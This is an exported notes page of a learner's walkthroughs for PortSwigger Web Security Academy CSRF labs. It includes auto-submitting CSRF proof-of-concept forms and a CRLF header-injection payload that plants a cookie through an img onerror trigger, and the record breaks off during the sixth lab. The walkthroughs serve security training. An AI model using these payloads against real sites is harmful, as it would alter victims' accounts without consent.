<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title>CSRF  —  PortSwigger</title><style>
/* cspell:disable-file */
/* webkit printing magic: print all background colors */
html {
	-webkit-print-color-adjust: exact;
}
* {
	box-sizing: border-box;
	-webkit-print-color-adjust: exact;
}

html,
body {
	margin: 0;
	padding: 0;
}
@media only screen {
	body {
		margin: 2em auto;
		max-width: 900px;
		color: rgb(55, 53, 47);
	}
}

body {
	line-height: 1.5;
	white-space: pre-wrap;
}

a,
a.visited {
	color: inherit;
	text-decoration: underline;
}

.pdf-relative-link-path {
	font-size: 80%;
	color: #444;
}

h1,
h2,
h3 {
	letter-spacing: -0.01em;
	line-height: 1.2;
	font-weight: 600;
	margin-bottom: 0;
}

.page-title {
	font-size: 2.5rem;
	font-weight: 700;
	margin-top: 0;
	margin-bottom: 0.75em;
}

h1 {
	font-size: 1.875rem;
	margin-top: 1.875rem;
}

h2 {
	font-size: 1.5rem;
	margin-top: 1.5rem;
}

h3 {
	font-size: 1.25rem;
	margin-top: 1.25rem;
}

.source {
	border: 1px solid #ddd;
	border-radius: 3px;
	padding: 1.5em;
	word-break: break-all;
}

.callout {
	border-radius: 3px;
	padding: 1rem;
}

figure {
	margin: 1.25em 0;
	page-break-inside: avoid;
}

figcaption {
	opacity: 0.5;
	font-size: 85%;
	margin-top: 0.5em;
}

mark {
	background-color: transparent;
}

.indented {
	padding-left: 1.5em;
}

hr {
	background: transparent;
	display: block;
	width: 100%;
	height: 1px;
	visibility: visible;
	border: none;
	border-bottom: 1px solid rgba(55, 53, 47, 0.09);
}

img {
	max-width: 100%;
}

@media only print {
	img {
		max-height: 100vh;
		object-fit: contain;
	}
}

@page {
	margin: 1in;
}

.collection-content {
	font-size: 0.875rem;
}

.column-list {
	display: flex;
	justify-content: space-between;
}

.column {
	padding: 0 1em;
}

.column:first-child {
	padding-left: 0;
}

.column:last-child {
	padding-right: 0;
}

.table_of_contents-item {
	display: block;
	font-size: 0.875rem;
	line-height: 1.3;
	padding: 0.125rem;
}

.table_of_contents-indent-1 {
	margin-left: 1.5rem;
}

.table_of_contents-indent-2 {
	margin-left: 3rem;
}

.table_of_contents-indent-3 {
	margin-left: 4.5rem;
}

.table_of_contents-link {
	text-decoration: none;
	opacity: 0.7;
	border-bottom: 1px solid rgba(55, 53, 47, 0.18);
}

table,
th,
td {
	border: 1px solid rgba(55, 53, 47, 0.09);
	border-collapse: collapse;
}

table {
	border-left: none;
	border-right: none;
}

th,
td {
	font-weight: normal;
	padding: 0.25em 0.5em;
	line-height: 1.5;
	min-height: 1.5em;
	text-align: left;
}

th {
	color: rgba(55, 53, 47, 0.6);
}

ol,
ul {
	margin: 0;
	margin-block-start: 0.6em;
	margin-block-end: 0.6em;
}

li > ol:first-child,
li > ul:first-child {
	margin-block-start: 0.6em;
}

ul > li {
	list-style: disc;
}

ul.to-do-list {
	padding-inline-start: 0;
}

ul.to-do-list > li {
	list-style: none;
}

.to-do-children-checked {
	text-decoration: line-through;
	opacity: 0.375;
}

ul.toggle > li {
	list-style: none;
}

ul {
	padding-inline-start: 1.7em;
}

ul > li {
	padding-left: 0.1em;
}

ol {
	padding-inline-start: 1.6em;
}

ol > li {
	padding-left: 0.2em;
}

.mono ol {
	padding-inline-start: 2em;
}

.mono ol > li {
	text-indent: -0.4em;
}

.toggle {
	padding-inline-start: 0em;
	list-style-type: none;
}

/* Indent toggle children */
.toggle > li > details {
	padding-left: 1.7em;
}

.toggle > li > details > summary {
	margin-left: -1.1em;
}

.selected-value {
	display: inline-block;
	padding: 0 0.5em;
	background: rgba(206, 205, 202, 0.5);
	border-radius: 3px;
	margin-right: 0.5em;
	margin-top: 0.3em;
	margin-bottom: 0.3em;
	white-space: nowrap;
}

.collection-title {
	display: inline-block;
	margin-right: 1em;
}

.page-description {
	margin-bottom: 2em;
}

.simple-table {
	margin-top: 1em;
	font-size: 0.875rem;
	empty-cells: show;
}
.simple-table td {
	height: 29px;
	min-width: 120px;
}

.simple-table th {
	height: 29px;
	min-width: 120px;
}

.simple-table-header-color {
	background: rgb(247, 246, 243);
	color: black;
}
.simple-table-header {
	font-weight: 500;
}

time {
	opacity: 0.5;
}

.icon {
	display: inline-block;
	max-width: 1.2em;
	max-height: 1.2em;
	text-decoration: none;
	vertical-align: text-bottom;
	margin-right: 0.5em;
}

img.icon {
	border-radius: 3px;
}

.user-icon {
	width: 1.5em;
	height: 1.5em;
	border-radius: 100%;
	margin-right: 0.5rem;
}

.user-icon-inner {
	font-size: 0.8em;
}

.text-icon {
	border: 1px solid #000;
	text-align: center;
}

.page-cover-image {
	display: block;
	object-fit: cover;
	width: 100%;
	max-height: 30vh;
}

.page-header-icon {
	font-size: 3rem;
	margin-bottom: 1rem;
}

.page-header-icon-with-cover {
	margin-top: -0.72em;
	margin-left: 0.07em;
}

.page-header-icon img {
	border-radius: 3px;
}

.link-to-page {
	margin: 1em 0;
	padding: 0;
	border: none;
	font-weight: 500;
}

p > .user {
	opacity: 0.5;
}

td > .user,
td > time {
	white-space: nowrap;
}

input[type="checkbox"] {
	transform: scale(1.5);
	margin-right: 0.6em;
	vertical-align: middle;
}

p {
	margin-top: 0.5em;
	margin-bottom: 0.5em;
}

.image {
	border: none;
	margin: 1.5em 0;
	padding: 0;
	border-radius: 0;
	text-align: center;
}

.code,
code {
	background: rgba(135, 131, 120, 0.15);
	border-radius: 3px;
	padding: 0.2em 0.4em;
	border-radius: 3px;
	font-size: 85%;
	tab-size: 2;
}

code {
	color: #eb5757;
}

.code {
	padding: 1.5em 1em;
}

.code-wrap {
	white-space: pre-wrap;
	word-break: break-all;
}

.code > code {
	background: none;
	padding: 0;
	font-size: 100%;
	color: inherit;
}

blockquote {
	font-size: 1.25em;
	margin: 1em 0;
	padding-left: 1em;
	border-left: 3px solid rgb(55, 53, 47);
}

.bookmark {
	text-decoration: none;
	max-height: 8em;
	padding: 0;
	display: flex;
	width: 100%;
	align-items: stretch;
}

.bookmark-title {
	font-size: 0.85em;
	overflow: hidden;
	text-overflow: ellipsis;
	height: 1.75em;
	white-space: nowrap;
}

.bookmark-text {
	display: flex;
	flex-direction: column;
}

.bookmark-info {
	flex: 4 1 180px;
	padding: 12px 14px 14px;
	display: flex;
	flex-direction: column;
	justify-content: space-between;
}

.bookmark-image {
	width: 33%;
	flex: 1 1 180px;
	display: block;
	position: relative;
	object-fit: cover;
	border-radius: 1px;
}

.bookmark-description {
	color: rgba(55, 53, 47, 0.6);
	font-size: 0.75em;
	overflow: hidden;
	max-height: 4.5em;
	word-break: break-word;
}

.bookmark-href {
	font-size: 0.75em;
	margin-top: 0.25em;
}

.sans { font-family: ui-sans-serif, -apple-system, BlinkMacSystemFont, "Segoe UI Variable Display", "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol"; }
.code { font-family: "SFMono-Regular", Menlo, Consolas, "PT Mono", "Liberation Mono", Courier, monospace; }
.serif { font-family: Lyon-Text, Georgia, ui-serif, serif; }
.mono { font-family: iawriter-mono, Nitti, Menlo, Courier, monospace; }
.pdf .sans { font-family: Inter, ui-sans-serif, -apple-system, BlinkMacSystemFont, "Segoe UI Variable Display", "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK JP'; }
.pdf:lang(zh-CN) .sans { font-family: Inter, ui-sans-serif, -apple-system, BlinkMacSystemFont, "Segoe UI Variable Display", "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC'; }
.pdf:lang(zh-TW) .sans { font-family: Inter, ui-sans-serif, -apple-system, BlinkMacSystemFont, "Segoe UI Variable Display", "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK TC'; }
.pdf:lang(ko-KR) .sans { font-family: Inter, ui-sans-serif, -apple-system, BlinkMacSystemFont, "Segoe UI Variable Display", "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK KR'; }
.pdf .code { font-family: Source Code Pro, "SFMono-Regular", Menlo, Consolas, "PT Mono", "Liberation Mono", Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK JP'; }
.pdf:lang(zh-CN) .code { font-family: Source Code Pro, "SFMono-Regular", Menlo, Consolas, "PT Mono", "Liberation Mono", Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC'; }
.pdf:lang(zh-TW) .code { font-family: Source Code Pro, "SFMono-Regular", Menlo, Consolas, "PT Mono", "Liberation Mono", Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK TC'; }
.pdf:lang(ko-KR) .code { font-family: Source Code Pro, "SFMono-Regular", Menlo, Consolas, "PT Mono", "Liberation Mono", Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK KR'; }
.pdf .serif { font-family: PT Serif, Lyon-Text, Georgia, ui-serif, serif, 'Twemoji', 'Noto Color Emoji', 'Noto Serif CJK JP'; }
.pdf:lang(zh-CN) .serif { font-family: PT Serif, Lyon-Text, Georgia, ui-serif, serif, 'Twemoji', 'Noto Color Emoji', 'Noto Serif CJK SC'; }
.pdf:lang(zh-TW) .serif { font-family: PT Serif, Lyon-Text, Georgia, ui-serif, serif, 'Twemoji', 'Noto Color Emoji', 'Noto Serif CJK TC'; }
.pdf:lang(ko-KR) .serif { font-family: PT Serif, Lyon-Text, Georgia, ui-serif, serif, 'Twemoji', 'Noto Color Emoji', 'Noto Serif CJK KR'; }
.pdf .mono { font-family: PT Mono, iawriter-mono, Nitti, Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK JP'; }
.pdf:lang(zh-CN) .mono { font-family: PT Mono, iawriter-mono, Nitti, Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC'; }
.pdf:lang(zh-TW) .mono { font-family: PT Mono, iawriter-mono, Nitti, Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK TC'; }
.pdf:lang(ko-KR) .mono { font-family: PT Mono, iawriter-mono, Nitti, Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK KR'; }
.highlight-default {
	color: rgba(50, 48, 44, 1);
}
.highlight-gray {
	color: rgba(115, 114, 110, 1);
	fill: rgba(115, 114, 110, 1);
}
.highlight-brown {
	color: rgba(159, 107, 83, 1);
	fill: rgba(159, 107, 83, 1);
}
.highlight-orange {
	color: rgba(217, 115, 13, 1);
	fill: rgba(217, 115, 13, 1);
}
.highlight-yellow {
	color: rgba(203, 145, 47, 1);
	fill: rgba(203, 145, 47, 1);
}
.highlight-teal {
	color: rgba(68, 131, 97, 1);
	fill: rgba(68, 131, 97, 1);
}
.highlight-blue {
	color: rgba(51, 126, 169, 1);
	fill: rgba(51, 126, 169, 1);
}
.highlight-purple {
	color: rgba(144, 101, 176, 1);
	fill: rgba(144, 101, 176, 1);
}
.highlight-pink {
	color: rgba(193, 76, 138, 1);
	fill: rgba(193, 76, 138, 1);
}
.highlight-red {
	color: rgba(205, 60, 58, 1);
	fill: rgba(205, 60, 58, 1);
}
.highlight-default_background {
	color: rgba(50, 48, 44, 1);
}
.highlight-gray_background {
	background: rgba(248, 248, 247, 1);
}
.highlight-brown_background {
	background: rgba(244, 238, 238, 1);
}
.highlight-orange_background {
	background: rgba(251, 236, 221, 1);
}
.highlight-yellow_background {
	background: rgba(251, 243, 219, 1);
}
.highlight-teal_background {
	background: rgba(237, 243, 236, 1);
}
.highlight-blue_background {
	background: rgba(231, 243, 248, 1);
}
.highlight-purple_background {
	background: rgba(248, 243, 252, 1);
}
.highlight-pink_background {
	background: rgba(252, 241, 246, 1);
}
.highlight-red_background {
	background: rgba(253, 235, 236, 1);
}
.block-color-default {
	color: inherit;
	fill: inherit;
}
.block-color-gray {
	color: rgba(115, 114, 110, 1);
	fill: rgba(115, 114, 110, 1);
}
.block-color-brown {
	color: rgba(159, 107, 83, 1);
	fill: rgba(159, 107, 83, 1);
}
.block-color-orange {
	color: rgba(217, 115, 13, 1);
	fill: rgba(217, 115, 13, 1);
}
.block-color-yellow {
	color: rgba(203, 145, 47, 1);
	fill: rgba(203, 145, 47, 1);
}
.block-color-teal {
	color: rgba(68, 131, 97, 1);
	fill: rgba(68, 131, 97, 1);
}
.block-color-blue {
	color: rgba(51, 126, 169, 1);
	fill: rgba(51, 126, 169, 1);
}
.block-color-purple {
	color: rgba(144, 101, 176, 1);
	fill: rgba(144, 101, 176, 1);
}
.block-color-pink {
	color: rgba(193, 76, 138, 1);
	fill: rgba(193, 76, 138, 1);
}
.block-color-red {
	color: rgba(205, 60, 58, 1);
	fill: rgba(205, 60, 58, 1);
}
.block-color-default_background {
	color: inherit;
	fill: inherit;
}
.block-color-gray_background {
	background: rgba(248, 248, 247, 1);
}
.block-color-brown_background {
	background: rgba(244, 238, 238, 1);
}
.block-color-orange_background {
	background: rgba(251, 236, 221, 1);
}
.block-color-yellow_background {
	background: rgba(251, 243, 219, 1);
}
.block-color-teal_background {
	background: rgba(237, 243, 236, 1);
}
.block-color-blue_background {
	background: rgba(231, 243, 248, 1);
}
.block-color-purple_background {
	background: rgba(248, 243, 252, 1);
}
.block-color-pink_background {
	background: rgba(252, 241, 246, 1);
}
.block-color-red_background {
	background: rgba(253, 235, 236, 1);
}
.select-value-color-uiBlue { background-color: undefined; }
.select-value-color-pink { background-color: rgba(225, 136, 179, 0.27); }
.select-value-color-purple { background-color: rgba(168, 129, 197, 0.27); }
.select-value-color-green { background-color: rgba(123, 183, 129, 0.27); }
.select-value-color-gray { background-color: rgba(84, 72, 49, 0.15); }
.select-value-color-translucentGray { background-color: undefined; }
.select-value-color-orange { background-color: rgba(224, 124, 57, 0.27); }
.select-value-color-brown { background-color: rgba(210, 162, 141, 0.35); }
.select-value-color-red { background-color: rgba(244, 171, 159, 0.4); }
.select-value-color-yellow { background-color: rgba(236, 191, 66, 0.39); }
.select-value-color-blue { background-color: rgba(93, 165, 206, 0.27); }
.select-value-color-pageGlass { background-color: undefined; }
.select-value-color-washGlass { background-color: undefined; }

.checkbox {
	display: inline-flex;
	vertical-align: text-bottom;
	width: 16;
	height: 16;
	background-size: 16px;
	margin-left: 2px;
	margin-right: 5px;
}

.checkbox-on {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20width%3D%2216%22%20height%3D%2216%22%20fill%3D%22%2358A9D7%22%2F%3E%0A%3Cpath%20d%3D%22M6.71429%2012.2852L14%204.9995L12.7143%203.71436L6.71429%209.71378L3.28571%206.2831L2%207.57092L6.71429%2012.2852Z%22%20fill%3D%22white%22%2F%3E%0A%3C%2Fsvg%3E");
}

.checkbox-off {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20x%3D%220.75%22%20y%3D%220.75%22%20width%3D%2214.5%22%20height%3D%2214.5%22%20fill%3D%22white%22%20stroke%3D%22%2336352F%22%20stroke-width%3D%221.5%22%2F%3E%0A%3C%2Fsvg%3E");
}
	
</style></head><body><article id="1f6d39dc-0232-80d9-a1fd-d847a884d449" class="page sans"><header><h1 class="page-title">CSRF  —  PortSwigger</h1><p class="page-description"></p></header><div class="page-body"><h2 id="1f6d39dc-0232-8015-8597-c5413eccb3ad" class=""><strong>1. CSRF vulnerability with no defenses</strong></h2><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="1f6d39dc-0232-8067-b363-dc5b0a19863a" class="code"><code class="language-JavaScript">1. login: wiener user
2. update the email
3. send this request to the repeater tab and generate a CSRF PoC

CSRF PAYLOAD  --  update the email value

&lt;!DOCTYPE html&gt;
&lt;html lang=&quot;en&quot;&gt;
	&lt;body&gt;
		&lt;form method=&quot;POST&quot; action=&quot;https://lab-id.web-security-academy.net/my-account/change-email&quot;&gt;
			&lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;fake11@mail.com&quot;&gt;
			&lt;input type=&quot;submit&quot; value=&quot;Submit Request&quot;&gt;
		&lt;/form&gt;
	&lt;/body&gt;
&lt;script&gt;document.forms[0].submit();&lt;/script&gt;
&lt;/html&gt;


4. go to the exploit server deliver to the victim and done
5. NOTE if you viewed the exploit then update the email value</code></pre><h2 id="1f7d39dc-0232-8082-a205-d027952d9478" class="">2. <strong>CSRF where token validation depends on request method</strong></h2><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="1f7d39dc-0232-804d-aef2-c433490fffdc" class="code"><code class="language-JavaScript">1. login: wiener user
2. update: email
3. send this request to the repaeter tab

TEST CASE
a. remove the csrf token  --  Missing parameter CSRF
b. change the csrf token to abcd1234  --  Invalid CSRF token

4. update the email while intercepting the request
5. send this request to the repeater drop all the request and turn off the intercept

6. change the POST parameter to GET and remove the csrf token
   GET /my-account/change-email?email=banana%40fake.com

7. Generate a CSRF PoC

CSRF PAYLOAD  --  update the email value

&lt;!DOCTYPE html&gt;
&lt;html lang=&quot;en&quot;&gt;
	&lt;body&gt;
		&lt;form method=&quot;GET&quot; action=&quot;https://lab-id.web-security-academy.net/my-account/change-email&quot;&gt;
			&lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;mango@fake.com&quot;&gt;
			&lt;input type=&quot;submit&quot; value=&quot;Submit Request&quot;&gt;
		&lt;/form&gt;
	&lt;/body&gt;
 &lt;script&gt;document.forms[0].submit();&lt;/script&gt;
&lt;/html&gt;


8. go to the exploit server deliver to the victim and done
9. NOTE if you viewed the exploit then update the email value.</code></pre><h2 id="1f7d39dc-0232-8068-961c-c9e1be4b72e4" class="">3. <strong>CSRF where token validation depends on token being present</strong></h2><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="1f7d39dc-0232-8055-8f00-c8e3d8985ca4" class="code"><code class="language-JavaScript">1. login: wiener user
2. update: email
3. send this request to the repaeter tab

TEST CASE
a. remove the CSRF token and send the request  --  302 Found  --  worked

4. update the email while intercepting the request
5. send this request to the repeater tab, drop all the request and turn off the intercept
6. generate a CSRF PoC

CSRF PAYLOAD  --  update the email value

&lt;!DOCTYPE html&gt;
&lt;html lang=&quot;en&quot;&gt;
	&lt;body&gt;
		&lt;form method=&quot;POST&quot; action=&quot;https://lab-id.web-security-academy.net/my-account/change-email&quot;&gt;
			&lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;mango@mail.com&quot;&gt;
			&lt;input type=&quot;submit&quot; value=&quot;Submit Request&quot;&gt;
		&lt;/form&gt;
	&lt;/body&gt;
  &lt;script&gt;document.forms[0].submit();&lt;/script&gt;
&lt;/html&gt;


7. press the back button of the browser  --  do not refresh the browser
8. go to the exploit server deliver to the victim and done
9. NOTE if you viewed the exploit then update the email value</code></pre><h2 id="1f7d39dc-0232-80cd-a4dd-f39970a15c67" class="">4. <strong>CSRF where token is not tied to user session</strong></h2><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="1f7d39dc-0232-807f-b7ed-f513a126336e" class="code"><code class="language-JavaScript">1. login : 1st wiener user -- 2nd incognito tab for carlos user
2. update the wiener&#x27;s email
3. update the email while intercepting the request
4. send this request to the repeater drop all the request and turn off the intercept

TEST CASE
a. send the capture request  --  302 Found
b. repeat the 3rd and 4th process then update the CSRF token with carlos user and send the request --  use inspect element and search csrf  --  get the CSRF token (carlos user) 
   302 Found

5. repear a and b but don&#x27;t send the request after updating the CSRF token  --  refresh the carlos users browser to get a new CSRF token
6. generate: CSRF PoC  --  update the email value

CSRF PAYLOAD

&lt;!DOCTYPE html&gt;
&lt;html lang=&quot;en&quot;&gt;
	&lt;body&gt;
		&lt;form method=&quot;POST&quot; action=&quot;https://lab-id.web-security-academy.net/my-account/change-email&quot;&gt;
			&lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;gvbbvb@fake.com&quot;&gt;
			&lt;input type=&quot;hidden&quot; name=&quot;csrf&quot; value=&quot;0dKOOMU9tx6DVAdENQ8M89pZ77GcL4vK&quot;&gt;
			&lt;input type=&quot;submit&quot; value=&quot;Submit Request&quot;&gt;
		&lt;/form&gt;
	&lt;/body&gt;
  &lt;script&gt;document.forms[0].submit();&lt;/script&gt;
&lt;/html&gt;
 

7. press the back button of the browser  --  do not refresh the browser
8. go to the exploit server deliver to the victim and done
9. NOTE if you viewed the exploit then update the email value</code></pre><h2 id="1f7d39dc-0232-80fa-b820-ef741fccc8ea" class="">5. <strong>CSRF where token is tied to non-session cookie</strong></h2><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="1f7d39dc-0232-80a8-b6fa-c495cb690fcd" class="code"><code class="language-JavaScript">%0d%0a     (next line: headers)

1. login : 1st wiener user -- 2nd incognito tab for carlos user

wiener  --  victim

2. update the wiener&#x27;s email while intercepting the request  
3. send to repeater and turn off the intercept  --  wiener
4. both the csrf cookie and token is tied to each other but !with the session id
5. submit a valid csrf token and cookie from another user  --  carlos user(attacker)   token: bqiL0ALje38VHAL1xEzFe01TrS9MxvtB    csrfKey: lD6bKKUsNi4ezUrZImDSE7qfH1f6r1gH  
6. after changed: send: request --&gt; 302 response: worked

EXPLOIT CONDITION
we need to perform 2 things: 1. Inject a csrfKey in the user&#x27;s session (HTTP Header Injection)
                             2. Send a CSRF attack to the victim with known CSRF token

7. go to the hhome page and search a string  --  after we search the string we got the new cookie: LastSearchTerm=apple;
8. send the request to repeater

9. add new line: headers  --  %0d%0a  &amp;&amp; Set-Cookie: csrfKey=lD6bKKUsNi4ezUrZImDSE7qfH1f6r1gH  (attacker)
   ?search=apple%0d%0aSet-Cookie:%20csrfKey=lD6bKKUsNi4ezUrZImDSE7qfH1f6r1gH

10. send the request  --  200 OK RESPONSE

11. generate a CSRF PoC  --  wiener change email request  (email=wienerFIRSTchange%40mail.com&amp;csrf=bqiL0ALje38VHAL1xEzFe01TrS9MxvtB)

EXPLAINATION: PAYLOAD  --  update the email value

&lt;!DOCTYPE html&gt;
&lt;html lang=&quot;en&quot;&gt;
	&lt;body&gt;
		&lt;form method=&quot;POST&quot; action=&quot;https://lab-id.web-security-academy.net/my-account/change-email&quot;&gt;
			&lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;wienerFIRSTchange@mail.com&quot;&gt;
			&lt;input type=&quot;hidden&quot; name=&quot;csrf&quot; value=&quot;bqiL0ALje38VHAL1xEzFe01TrS9MxvtB&quot;&gt;
			&lt;input type=&quot;submit&quot; value=&quot;Submit Request&quot;&gt;
		&lt;/form&gt;
	&lt;/body&gt;
&lt;/html&gt;


change the value: email  --  wienerCSRFpoc@mail.com
change the value: csrf token: attacker  --  carlos
   		&lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;wienerCSRFpoc@mail.com&quot;&gt;
			&lt;input type=&quot;hidden&quot; name=&quot;csrf&quot; value=&quot;bqiL0ALje38VHAL1xEzFe01TrS9MxvtB&quot;&gt;

add a &lt;img src=&quot;https://lab-id.web-security-academy.net/?search=apple%0d%0aSet-Cookie:%20csrfKey=lD6bKKUsNi4ezUrZImDSE7qfH1f6r1gH; SameSite=None&quot; onerror=&quot;document.forms[0].submit()&quot;&gt;
    
    
FINAL PAYLOAD  --  update the email value

&lt;!DOCTYPE html&gt;
&lt;html lang=&quot;en&quot;&gt;
	&lt;body&gt;
		&lt;form method=&quot;POST&quot; action=&quot;https://lab-id.web-security-academy.net/my-account/change-email&quot;&gt;
			&lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;wienerCSRFpoc1bhb11@mail.com&quot;&gt;
			&lt;input type=&quot;hidden&quot; name=&quot;csrf&quot; value=&quot;bqiL0ALje38VHAL1xEzFe01TrS9MxvtB&quot;&gt;
			&lt;input type=&quot;submit&quot; value=&quot;Submit Request&quot;&gt;
		&lt;/form&gt;
    &lt;img src=&quot;https://lab-id.web-security-academy.net/?search=apple%0d%0aSet-Cookie:%20csrfKey=lD6bKKUsNi4ezUrZImDSE7qfH1f6r1gH%3b%20SameSite=None&quot; onerror=&quot;document.forms[0].submit()&quot;&gt;
	&lt;/body&gt;
&lt;/html&gt;


POST ANALYSIS
src=&quot;payload&quot;  --  https://lab-id.web-security-academy.net/?search=apple Set-Cookie: csrfKey=lD6bKKUsNi4ezUrZImDSE7qfH1f6r1gH; SameSite=None

  
12. press the back button of the browser  --  do not refresh the browser
13. go to the exploit server deliver to the victim and done
14. NOTE if you viewed the exploit then update the email value</code></pre><h2 id="1f8d39dc-0232-80ee-bbc4-eaae92efac3f" class="">6. <strong>CSRF where token is duplicated in cookie</strong></h2><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="1f8d39dc-0232-80f9-9323-cfa062bb265d" class="code"><code class="language-JavaScript">1. login
2. update: email  &amp;&amp;  send this request to the repeater tab

TEST CASE
both the CSRF token and cookie are same
Cookie: session=070ciSVoUcfuKbNkq6R0TZ3ug0uMQnQy; csrf=LAQXGMz6Eg2DW8mxeHcKSkNQdY20n78q
email=firstCHANGE%40mail.com&amp;csrf=LAQXGMz6Eg2DW8mxeHcKSkNQdY20n78q

a. remove the CSRF token only  --  Missing parameter&#x27;csrf&#x27;
b. now remove the csrf cookie only  --  Invalid CSRF token
c. add an extra string: end: CSRF token or cookie  --  Invalid CSRF token
